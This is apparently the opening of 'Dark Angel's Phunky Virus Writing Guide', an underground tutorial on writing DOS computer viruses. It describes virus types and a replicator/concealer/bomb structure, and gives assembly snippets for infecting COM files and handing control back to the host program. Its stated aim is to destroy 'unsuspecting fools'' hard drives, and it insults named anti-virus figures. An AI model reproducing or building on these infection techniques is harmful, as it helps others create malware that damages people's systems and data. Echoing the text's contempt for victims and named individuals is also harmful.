//==//  //  //  /||      //      //====  //==//  //|   //   //  //  //  //  //||     //      //      //  //  //||  //  //==//  //==//  //=||    //      //      //  //  // || // //      //  //  //  ||   //      //      //  //  //  ||////      //  //  //   ||  //====  //====  //==//  //   ||/-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-DISCLAIMER: The author hereby disclaims himself-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-DEDICATION: This was written to make the lives  of scum such as Patty Hoffman, John McAffee,  and Ross Greenberg a living hell.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-OTHER STUFF:  Thanks go to The Shade of Sorrow,  Demogorgon, and Orion Rouge on their comments  (which I occasionally listened to!).   Thanks  also to Hellraiser, who gave me an example of  some virus source code (his own, of course).-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Dark Angel's Phunky Virus Writing Guide---- ------- ------ ----- ------- -----Virii are  wondrous creations written for the sole purpose of spreading anddestroying the  systems of unsuspecting fools.  This eliminates the systemsof simpletons  who can't  tell that there is a problem when a 100 byte filesuddenly blossoms  into a  1,000 byte  file.   Duh.  These low-lifes do notdeserve to  exist, so  it is  our sacred duty to wipe their hard drives offthe face of the Earth.  It is a simple matter of speeding along survival ofthe fittest.Why did  I create  this guide?  After writing several virii, I have noticedthat virus  writers generally  learn how to write virii either on their ownor by  examining the  disassembled code  of  other  virii.    There  is  anincredible lack  of information  on the  subject.   Even books published bymorons such as Burger are, at best, sketchy on how to create a virus.  Thisguide will show you what it takes to write a virus and also will give you aplethora of source code to include in your own virii.Virus writing  is not  as hard  as you  might first  imagine.   To write aneffective virus,  however, you  *must*  know  assembly  language.    Short,compact code  are hallmarks  of assembly  language and  these are desirablecharacteristics of  virii.  However, it is *not* necessary to write in pureassembly.   C may  also be  used, as  it allows almost total control of thesystem while  generating relatively compact code (if you stay away from thelibrary functions).   However,  you still  must access  the interrupts,  soassembly knowledge  is still  required.  However, it is still best to stickwith pure  assembly,  since  most  operations  are  more  easily  coded  inassembly.  If you do not know assembly, I would recommend picking up a copyof The Microsoft Macro Assembler Bible (Nabajyoti Barkakati, ISBN #: 0-672-22659-6).   It is an easy-to-follow book covering assembly in great detail.Also get yourself a copy of Undocumented DOS (Schulman, et al, ISBN #0-201-57064-5), as it is very helpful.The question  of which  compiler to  use arises  often.   I  suggest  usingBorland Turbo  Assembler and/or  Borland C++.   I  do not  have a  copy  ofZortech C  (it was  too large  to download), but I would suspect that it isalso a good choice.  Stay away from Microsoft compilers, as they are not asflexible nor as efficient as those of other vendors.A few more items round out the list of tools helpful in constructing virii.The latest version of Norton Utilities is one of the most powerful programsavailable, and  is immeasurably  helpful.   MAKE SURE YOU HAVE A COPY!  Youcan find  it on  any decent board.  It can be used during every step of theprocess, from  the writing  to the testing.  A good debugger helps.  Memorymanagement  utilities   such  as   MAPMEM,  PMAP,   and  MARK/RELEASE,  areinvaluable, especially  when coding  TSR virii.   Sourcer,  the  commentingdisassembler, is  useful when  you wish  to examine the code of other virii(this is a good place to get ideas/techniques for your virus).Now that  you have  your tools,  you are  ready to  create a  work  of  artdesigned to smash the systems of cretins.  There are three types of virii:     1) Tiny virii (under 500 bytes) which are designed to be  undetectable        due to their small size.   TINY  is  one  such  virus.    They  are        generally very simple because their code length is so limited.     2) Large  virii  (over 1,500 bytes)   which   are   designed   to   be        undetectable because they cover their tracks very  well  (all  that        code DOES have a use!).  The best example  of  this  is  the  Whale        virus, which is perhaps the best 'Stealth' virus in existence.     3) Other virii which are not designed to be hidden at all (the writers        don't give  a  shit).    The  common  virus  is  like  this.    All        overwriting virii are in this category.You must  decide which  kind of  virus you wish to write.  I will mostly bediscussing  the  second  type  (Stealth  virii).    However,  many  of  thetechniques discribed  may be easily applied to the first type (tiny virii).However, tiny  virii generally do not have many of the "features" of largervirii, such  as  directory  traversal.    The  third  type  is  more  of  areplicating trojan-type,  and will  warrant a  brief  (very,  very  brief!)discussion later.A virus may be divided into three parts: the replicator, the concealer, andthe bomb.   The  replicator part  controls the spread of the virus to otherfiles, the concealer keeps the virus from being detected, and the bomb onlyexecutes when  the activation  conditions of the virus (more on that later)are satisfied.-=-=-=-=-=-=-=-THE REPLICATOR-=-=-=-=-=-=-=-The job  of the  replicator is to spread the virus throughout the system ofthe clod  who has caught the virus.  How does it do this without destroyingthe file it infects?  The easiest type of replicator infects COM files.  Itfirst saves  the first  few bytes  of the  infected file.  It then copies asmall portion of its code to the beginning of the file, and the rest to theend.  +----------------+      +------------+  | P1 | P2        |      | V1 | V2    |  +----------------+      +------------+ The uninfected file     The virus codeIn the  diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1and V2  are parts 1 and 2 of the virus.  Note that the size of P1 should bethe same  as the size of V1, but the size of P2 doesn't necessarily have tobe the  same size  as V2.   The  virus first  saves P1 and copies it to theeither 1)  the end  of the  file or 2) inside the code of the virus.  Let'sassume it copies the code to the end of the file.  The file now looks like:  +---------------------+  | P1 | P2        | P1 |  +---------------------+Then, the  virus copies  the first  part of  itself to the beginning of thefile.  +---------------------+  | V1 | P2        | P1 |  +---------------------+Finally, the virus copies the second part of itself to the end of the file.The final, infected file looks like this:  +-----------------------------+  | V1 | P2        | P1 | V2    |  +-----------------------------+The question  is: What  the fuck  do V1 and V2 do?  V1 transfers control ofthe program to V2.  The code to do this is simple.     JMP FAR PTR Duh       ; Takes four bytesDuh  DW  V2_Start          ; Takes two bytesDuh is  a far pointer (Segment:Offset) pointing to the first instruction ofV2.   Note that  the value  of Duh must be changed to reflect the length ofthe file  that is  infected.   For example,  if the  original size  of  theprogram is  79 bytes,  Duh must  be changed  so  that  the  instruction  atCS:[155h] is  executed.   The value of Duh is obtained by adding the lengthof V1,  the original size of the infected file, and 256 (to account for thePSP).  In this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal(155 hex).An alternate, albeit more difficult to understand, method follows:     DB 1101001b              ; Code for JMP (2 byte-displacement)Duh  DW V2_Start - OFFSET Duh ; 2 byte displacementThis inserts  the jump  offset directly  into the  code following  the jumpinstruction.  You could also replace the second line with     DW V2_Start - $which accomplishes the same task.V2 contains the rest of the code, i.e. the stuff that does everything else.The last  part of  V2 copies  P1 over  V1 (in memory, not on disk) and thentransfers control  to the  beginning of the file (in memory).  The originalprogram will  then run happily as if nothing happened.  The code to do thisis also very simple.     MOV SI, V2_START      ; V2_START is a LABEL marking where V2 starts     SUB SI, V1_LENGTH     ; Go back to where P1 is stored     MOV DI, 0100h         ; All COM files are loaded @ CS:[100h] in memory     MOV CX, V1_LENGTH     ; Move CX bytes     REP MOVSB             ; DS:[SI] -> ES:[DI]     MOV DI, 0100h     JMP DIThis code assumes that P1 is located just before V2, as in:P1_Stored_Here:     .     .     .V2_Start:It also  assumes ES  equals CS.  If these assumptions are false, change thecode accordingly.  Here is an example:     PUSH CS               ; Store CS     POP  ES               ;  and move it to ES                           ; Note MOV ES, CS is not a valid instruction     MOV SI, P1_START      ; Move from whereever P1 is stored     MOV DI, 0100h         ;  to CS:[100h]     MOV CX, V1_LENGTH     REP MOVSB     MOV DI, 0100h     JMP DIThis code  first moves CS into ES and then sets the source pointer of MOVSBto where  P1 is located.  Remember that this is all taking place in memory,so you  need the  OFFSET of P1, not just the physical location in the file.The offset  of P1  is 100h  higher than  the physical file location, as COMfiles are loaded starting from CS:[100h].So here's a summary of the parts of the virus and location labels:V1_Start:     JMP FAR PTR DuhDuh  DW  V2_StartV1_End:P2_Start:P2_End:P1_Start:  ; First part of the program stored here for future useP1_End:V2_Start: